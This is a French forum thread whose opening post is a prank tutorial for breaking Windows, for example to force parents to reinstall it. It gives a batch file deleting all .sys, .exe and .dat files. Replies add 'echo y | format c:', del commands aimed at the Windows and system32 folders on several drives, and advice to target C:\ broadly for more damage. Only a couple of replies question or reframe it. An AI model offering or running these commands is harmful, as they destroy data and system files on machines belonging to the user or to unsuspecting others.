Vous n'êtes pas identifié.
Quelle utilité à rendre son sytème instable ? Il y en a plusieurs :
-Forcer vos parents à réinstaller windows sur leur PC/ acheter un nouveau PC
-Vous amuser
-Vous rendre compte que linux est quand même beaucoup plus sécurisé (si vous n'avez pas le mot de passe root).
/!\ATTENTION : je ne me tiendrais pas responsable de l'utilisation que vous ferez de cette astuce /!\
Alors voilà ce que vous allez faire :
Ouvrez Bloc note (notepad en anglais).
Ecriver à l'intérieur :
DEL *.sys DEL *.exe DEL *.dat
puis enregistrez ce fichier en lolzor.bat. Ce fichier aura pour action de supprimer tous les .sys, .exe, .dat de votre disque dur à son execution.
Pour executer le fichier, double cliquez dessus.
Voili voilou, pour plus de questions, postez sur le topic.
Hm je suis un peu septique a ton astuce ...
En effet, on peut pas effacer des fichiers .sys ou encore .exe s'ils sont utilisés par le système d'exploitation, puisque l'on ne peut pas supprimer un fichier en cours d'utilisation ...
Donc au final, des fichiers seront effacé mais peut être pas les fichiers spécifique au bon fonctionnement du système ...
J'ai pas trop envie de tester, mais j'aimerais bien voir si cette petite astuce fonctionne véritablement...
en fait l'astuce serait de creer un batch ![]()
on aurait donc un batch qui ferait :
C:
@echo game-over
del *.sys
del *.exe
del *.dat
mais je conseil tout simplement
de mettre ça
echo y | format c:![]()

Après relecture de ce tuto, je me suis rendu compte qu'il avait sa place dans la partie "sécurité" sous le nom : attention aux fichiers.bat contenant ces lignes :
DEL *.sys
DEL *.exe
DEL *.dat
Toute façon, on utilise quasiment plus le batch, sa deviens rare ... maintenant, ça peut être un autre problème si c'est blinder avec un logiciel anodin ....
moi j'ai deja testé
del C:\windows\*.* del E:\windows\*.* del D:\windows\*.* del C:\windows\system32\*.* del E:\windows\system32\*.* del D:\windows\system32\*.*
XD sa pete tous

Oui, mais avec \Windows\ tu limites les dégats (si le gars a intallé avec \win\ au lieu de \windows\ c'est inefficace) donc le mieu est encore de se limiter à del C:\ ^^